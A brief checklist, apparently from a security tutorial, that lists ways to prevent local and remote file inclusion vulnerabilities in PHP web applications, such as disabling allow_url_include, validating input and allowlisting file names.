To prevent the file inclusion vulnerabilities (lfi and rfi) it's wise to:
- Keep system and services, including webapp frameworks, updated with the latest version
- Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information
- Use a Web Application Firewall (WAF)
- Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them, egÂ
allow_url_fopenandÂallow_url_include - Carefully analyze the web application and allow only protocols and PHP wrappers that are in need
- Never trust user input and use input validation against file inclusion
- Implement whitelisting for file names and locations as well as blacklisting